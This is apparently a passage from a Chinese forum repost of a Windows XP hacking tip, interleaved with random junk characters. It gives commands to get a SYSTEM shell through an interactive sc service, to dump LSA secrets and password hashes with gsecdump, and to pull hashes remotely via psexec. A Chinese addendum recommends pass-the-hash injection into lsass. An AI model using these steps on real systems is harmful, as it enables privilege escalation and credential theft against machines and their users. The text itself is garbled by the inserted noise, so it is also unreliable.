o get a DOS Prompt as NT system:
a+ l) F# e2 [" {- b2 V2 j6 m* A
3 |# s3 g+ I4 w+ CC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact. D7 |' Z( ]; {
[SC] CreateService SUCCESS+ K y7 a% R r* i1 W6 {* l
( h- y& H6 t0 h
C:\>sc start shellcmdline, \& q$ B9 S, m& ]( r4 b( x
[SC] StartService FAILED 1053:- T# R0 C7 r/ w. {/ x: F
2 l. J2 }9 M0 P7 JThe service did not respond to the start or control request in a timely fashion.* w/ T/ p% p4 E
7 T, R0 m% h) \0 wC:\>sc delete shellcmdline
6 l* n* b$ i- J) a3 B- S5 K& k$ y[SC] DeleteService SUCCESS
6 `# L6 O2 W! g3 s1 e1 [" |5 u1 ?7 O9 C# n0 b& D$ t6 P# X% B
------------
/ i3 X5 w' N* g( {# Y$ B
9 ~4 v* K9 J- |Then in the new DOS window:) C0 W2 \ ?% `3 Z: f
9 u5 P: _; ~! p4 }Microsoft Windows XP [Version 5.1.2600]
& }9 J: l1 K. |0 E(C) Copyright 1985-2001 Microsoft Corp.
1 Y- G# p2 s8 m
/ Z0 n$ m/ M, b% B; t% E: yC:\WINDOWS\system32>whoami+ s' j, m0 e: h$ Q& U& U& X1 b m
NT AUTHORITY\SYSTEM
) j- q, j1 V/ |! |! G! H
" b% {1 _0 ^7 z. MC:\WINDOWS\system32>gsecdump -h/ J* `$ H6 u1 T# {) y
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)0 ]9 F% z+ k O5 v5 D
usage: gsecdump [options], l4 A- o) k; Q2 |) Y
: N$ c4 e j7 P- E. l6 M5 H( g0 I4 y- `
options:
6 F, b8 q! `& _, s- F-h [ --help ] show help& Q! u0 r4 ?. T) ]
-a [ --dump_all ] dump all secrets
5 `, ]! U8 _- C8 C* g5 p-l [ --dump_lsa ] dump lsa secrets j8 r' o9 b0 m! I" N0 [/ o% Y$ Q
-w [ --dump_wireless ] dump microsoft wireless connections
& e5 v7 a3 R' \5 e% o% k% P3 U-u [ --dump_usedhashes ] dump hashes from active logon sessions
) h, D/ n$ D* N! N. C) v-s [ --dump_hashes ] dump hashes from SAM/AD
0 s8 X. B3 {# f6 K& b
/ B' y& \, U* Q/ O# l0 n3 hAlthough I like to use:
8 }3 \+ f' K k7 p% ?( G0 Z* n; c1 o) Z6 g
PsExec v1.83 - Execute processes remotely
) r7 P/ D7 z3 Z# FCopyright (C) 2001-2007 Mark Russinovich
% t8 z/ r; q* a$ ^* USysinternals - 链接标记[url]www.sysinternals.com[/url]
( ]) e9 s2 F% G0 Z, u; x& N3 \! G; o/ N. ?$ V! a! y" q, h
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT8 \) P1 g* k$ o- V* u5 g N
. t) I. |% B1 i9 y
to get the hashes from active logon sessions of a remote system.7 N, k" I* _- [2 S. p
* y$ @0 c2 `! T, o& wThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
1 W0 [( s7 j/ {$ d! W/ d( M- k5 n8 v$ Q$ w' K# z& b
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
" k- t3 w( o! t原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]. ? ^; S/ P0 d, n' r
7 t: ?5 m, ~4 i6 y3 |5 V我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。0 v# v2 ]* P8 b0 f0 C
|